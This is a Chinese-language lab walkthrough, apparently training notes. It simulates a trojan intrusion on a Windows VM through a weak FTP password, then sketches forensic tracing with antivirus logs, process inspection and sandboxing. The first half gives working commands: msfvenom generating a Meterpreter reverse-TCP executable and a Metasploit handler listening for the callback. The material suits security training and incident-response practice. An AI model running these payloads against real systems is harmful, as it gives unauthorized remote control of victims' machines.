环境准备:

Linux虚拟机:内网部署蜜罐探测系统 。(192.168.XX.XX)

windows虚拟机:有FTP弱口令漏洞的web服务 (受害机器) (192.168.125.134)

kali Linux虚拟机:攻击机服务端 。 (192.168.125.130)

MAC:管理员电脑。(192.168.XX.XX)

一、利用kailiLinuxmsf生成windows木马文件

生成 Payload： 使用 msfvenom 来创建木马payload。例如，创建一个windows/meterpreter/reverse_tcp payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的监听IP地址> LPORT=<你的监听端口> -f exe > /path/to/your_malware.exe

替换 <你的监听IP地址> 和 <你的监听端口> 为你的实际IP地址和端口。选择一个端口号，如 4444，并确保该端口在你的防火墙中是开放的。

利用windows设定到FTP弱口令上传木马文件,并执行木马程序.

设置 Metasploit 监听器

配置 exploit/multi/handler： 在msfconsole中，设置一个监听器来捕获反向连接：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <你的监听IP地址>
set LPORT <你的监听端口>
exploit -j -z

运行m.exe

二、利用msf工具远控windows主机对内网C段进行扫描

简单的信息搜集

利用fscan工具进行内网资产探测

蜜罐系统收到告警

二、对Windows机进行溯源

进程工具下载

Sysinternals 实用工具 - Sysinternals | Microsoft Learn

溯源取证思维导图

一、首先查看杀毒软件日志

定位到病毒位置

二、要是没有杀毒软件

查看异常进程

找到病毒文件

三、沙箱分析